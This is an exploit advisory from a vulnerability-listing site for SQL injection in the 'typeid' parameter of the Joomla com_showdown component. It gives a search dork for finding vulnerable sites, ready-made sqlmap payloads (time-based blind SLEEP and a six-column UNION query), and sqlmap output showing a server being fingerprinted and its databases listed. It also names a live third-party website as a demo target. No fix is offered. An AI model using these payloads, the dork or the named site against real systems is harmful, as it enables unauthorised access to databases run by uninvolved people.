Joomla com_showdown SQL injection Vulnerability

2016.07.25
Credit: xBADGIRL21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Joomla com_showdown SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_showdown # version : 1.5.0 # Tested on: [ Windows 7 ] # skype:xbadgirl21 # Date: 2016/07/24 # video Proof : https://youtu.be/IglNYsDcV3g ###################### # [+] DESCRIPTION : ###################### # [+] an SQL injection been Detected in this Joomla components showdown after you add ['] or ["] to # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL or # [+] You Will Notice a change in the Frontpage of the target . ###################### # [+] Poc : ###################### # [typeid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_showdown&typeid=999999 [INJECT HERE] ###################### # [+] SQLmap PoC: ###################### # GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # Parameter: typeid (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_showdown&typeid=11 AND SLEEP(5) # # Type: UNION query # Title: Generic UNION query (NULL) - 6 columns # Payload: option=com_showdown&typeid=11 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x4d7254764c576b495a504e73726d636f6a65695971624f6f64424e6870 # 43554447614a527451564c,0x71706a7171),NULL-- LZga # --- # [12:59:46] [INFO] the back-end DBMS is MySQL # web server operating system: Linux Debian 6.0 (squeeze) # web application technology: PHP 5.2.6, Apache 2.2.16 # back-end DBMS: MySQL >= 5.0.12 # [12:59:46] [INFO] fetching database names # available databases [3]: ###################### # [+] Live Demo : ###################### # http://www.circuse.eu/index.php?option=com_showdown&typeid=11 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://youtu.be/IglNYsDcV3g


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top